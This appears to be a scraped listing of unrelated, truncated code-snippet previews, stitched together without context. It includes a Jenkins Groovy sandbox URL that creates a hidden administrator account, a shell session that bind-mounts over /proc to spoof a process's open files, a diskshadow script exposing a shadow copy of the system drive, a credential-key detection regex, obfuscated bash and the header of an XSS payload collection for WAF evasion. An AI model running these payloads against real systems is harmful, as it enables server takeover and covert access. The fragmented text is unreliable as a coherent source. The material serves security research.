Where to find user agent strings?
https://explore.whatismybrowser.com/useragents/explore/software_name/facebook-bot/
Looking for same but for Apache2? Here: https://techexpert.tips/apache/apache-blocking-bad-bots-crawlers/
| # ps -aef | grep 94 | |
| root 94 2 0 Jun16 ? 00:00:00 [kworker/6:1H] | |
| root 594 2 0 Jun16 ? 00:00:00 [ipv6_addrconf] | |
| root 4692 2509 0 01:17 pts/0 00:00:00 grep 94 | |
| root 20394 2 0 Oct08 ? 00:00:20 [kworker/u32:2] | |
| # mkdir -p spoof/fd; mount -o bind spoof /proc/94; ln -s socket:\[283\] /proc/94/fd/99; ls -la /proc/94/fd | |
| total 4 | |
| drwxr-xr-x 2 root root 4096 Oct 9 01:16 . | |
| dr-xr-xr-x 193 root root 0 Jun 16 17:40 .. | |
| lrwxrwxrwx 1 root root 12 Oct 9 01:16 99 -> socket:[283] |
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
| set -eEu | |
| set -o pipefail | |
| trap 'echo "L$LINENO"; O70; exit -1' ERR | |
| O54=4 | |
| function O70() | |
| { | |
| if [[ ! -z "${O57+x}" ]]; then | |
| if [[ -f "${O57}" ]]; then | |
| rm -f "${O57}" | |
| fi |
| set context persistent nowriters | |
| add volume c: alias someAlias | |
| create | |
| expose %someAlias% z: | |
| exec scriptfile.cmd | |
| delete shadows volume %someAlias% | |
| reset | |
| exit |
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
| http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}} |
| _____ _ _ _ __ _______ _____ _____ _ _ _ _ | |
| | __ \ | | | | | \ \ / / ___/ ___| / __ \ | | | | | | | | |
| | | \/ |__ ___| |_| |_ ___ \ V /\ `--.\ `--. | / \/ |__ ___ __ _| |_ ___| |__ ___ ___| |_ | |
| | | __| '_ \ / _ \ __| __|/ _ \ / \ `--. \`--. \ | | | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __| | |
| | |_\ \ | | | __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | | __/ (_| | |_\__ \ | | | __/ __/ |_ | |
| \____/_| |_|\___|\__|\__|\___/ \/ \|____/\____/ \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__| | |
| A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air. | |
| Simple character manipulations. |
